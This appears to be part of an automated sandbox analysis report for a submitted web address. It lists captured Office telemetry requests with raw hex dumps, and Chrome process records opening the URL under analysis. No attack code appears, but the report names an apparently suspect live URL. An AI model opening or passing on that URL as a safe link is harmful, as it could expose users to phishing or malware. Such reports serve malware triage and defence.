                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.64986913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:22 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:23 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:23 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB6AD293"
                                                  x-ms-request-id: 97972df5-901e-008f-1591-3f67a6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171023Z-174f7845968cdxdrhC1EWRg0en0000000x8g0000000034r5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:23 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.64987113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:23 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:24 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1354
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE0662D7C"
                                                  x-ms-request-id: 82133bf1-201e-005d-5567-40afb3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171024Z-174f7845968pf68xhC1EWRr4h80000000xb000000000thn3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:24 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.64987013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:24 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:24 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1391
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF58DC7E"
                                                  x-ms-request-id: 32ac4486-a01e-0050-5791-3fdb6e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171024Z-174f7845968kvnqxhC1EWRmf3g0000000g2g000000006w70
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:24 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.64987213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:24 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:24 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:24 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1403
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                  ETag: "0x8DC582BDCDD6400"
                                                  x-ms-request-id: ee9d2ac9-001e-00a2-1991-3fd4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171024Z-174f7845968swgbqhC1EWRmnb40000000xe00000000063ee
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:24 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:1
                                                  Start time:12:09:19
                                                  Start date:27/11/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                  Imagebase:0x7ff684c40000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:12:09:22
                                                  Start date:27/11/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1956,i,5367884434613329053,5550688363984249311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff684c40000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:4
                                                  Start time:12:09:29
                                                  Start date:27/11/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adrianocarreira.com/team/index.html"
                                                  Imagebase:0x7ff684c40000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  No disassembly